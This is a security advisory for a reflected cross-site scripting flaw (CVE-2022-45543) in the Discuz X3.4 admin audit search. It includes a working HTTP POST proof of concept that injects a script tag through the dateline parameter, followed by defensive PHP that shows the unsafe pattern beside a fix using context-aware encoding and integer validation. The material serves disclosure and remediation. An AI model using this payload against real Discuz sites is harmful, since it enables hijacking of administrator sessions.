Discuz X3.4 Backend Reflected XSS (CVE-2022-45543)

Description

The audit search form of the admin backend's content audit component reflects the POST parameters dateline, title, tpp and username into the HTML response without adequate output encoding. The injected value bypasses Discuz's built-in security check, can break out of and hijack the callback URL link, and is also reflected into a setTimeout() call at the end of the HTML response, so arbitrary JavaScript can be injected there as well.

Affected Version

DiscuzX <= 3.4, SC_UTF8_20221111

POC

POST /cms/discuz/upload/admin.php?action=moderate&operation=threads HTTP/1.1
Host: 192.168.0.4
Content-Length: 166
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.0.4
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.0.4/cms/discuz/upload/admin.php?action=moderate&operation=threads
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: 5Kkn_2132_saltkey=y03s5T45; 5Kkn_2132_lastvisit=1668496347; 5Kkn_2132_ulastactivity=07108qps3b3FkXEEZNxrT%2BtyQpXYN9%2FSOodQCNbMLoO%2BO6DOk8pF; 5Kkn_2132_auth=7791L55DZFdkAgcM5rDcnjIiVH0t%2BptlGCIqLkAhUIRMsUDTnq%2BGi7atBCt%2BPdyl2mCVv0hA3jA%2BxaOfDB1h; 5Kkn_2132_lastcheckfeed=1%7C1668501456; 5Kkn_2132_nofavfid=1; 5Kkn_2132_sid=yhpz44; 5Kkn_2132_lip=172.17.0.1%2C1668502019; 5Kkn_2132_lastact=1668502045%09admin.php%09
Connection: close

formhash=288a0c1d&scrolltop=&anchor=&username=aa&title=aa&tpp=20&filter=normal&modfid=all&dateline=604"></a><script>alert(1)</script><!--&modsubmit=%E6%8F%90%E4%BA%A4
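The payload above lands in two different output contexts: an HTML attribute (the href of the callback link) and a JavaScript string inside setTimeout(). The following PHP is an illustration added here for defenders; it is not Discuz's own code, and the function names, the constructed setTimeout() usage and the sample value are assumptions. It shows the unsafe interpolation pattern beside a hardened form that encodes each context separately, and the even simpler fix of validating dateline as an integer before use.

```php
<?php
// Added illustration, not Discuz code: context-aware output encoding for the
// two sinks named in the advisory (href attribute and setTimeout() string).
// Function names and the inline-script shape are constructed assumptions.

// Constructed sample: the dateline value from the advisory's PoC.
$dateline = '604"></a><script>alert(1)</script><!--';

// Unsafe pattern (shown for contrast): the raw request value is concatenated
// into an attribute and into inline JavaScript. The double quote closes the
// attribute, and the <script> tag is parsed by the browser as markup.
function render_unsafe(string $value): string {
    return '<a href="admin.php?action=moderate&dateline=' . $value . '">next</a>'
         . '<script>setTimeout("jump(' . $value . ')", 1000);</script>';
}

// Hardened pattern: one encoder per context.
function render_safe(string $value): string {
    // ENT_QUOTES escapes both " and ' so the value cannot terminate the
    // attribute; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning "".
    $attr = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    // json_encode produces a quoted JS string literal; the HEX flags \u-escape
    // < > & ' and " so the literal can never contain a </script> sequence.
    $js = json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);

    return '<a href="admin.php?action=moderate&amp;dateline=' . $attr . '">next</a>'
         . '<script>setTimeout(function () { jump(' . $js . '); }, 1000);</script>';
}

// Where a parameter is numeric by design (dateline is a time span in days,
// tpp a page size), strict validation removes the problem entirely: anything
// that is not a short run of digits is rejected and replaced by a default.
function normalize_int(string $value, int $default): int {
    return preg_match('/\A\d{1,10}\z/', $value) === 1 ? (int) $value : $default;
}

echo render_safe($dateline), PHP_EOL;
echo 'dateline after validation: ', normalize_int($dateline, 0), PHP_EOL;
echo 'tpp after validation: ', normalize_int('20', 20), PHP_EOL;
```

Note that htmlspecialchars() alone would not protect the setTimeout() sink: it leaves a JavaScript string breakable with a backslash or a line terminator, which is why the script context gets json_encode() with the HEX flags instead. For the numeric parameters, validation before use is preferable to encoding after the fact.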

Reference

Reported by Srpopty; the vulnerability was discovered using Corax.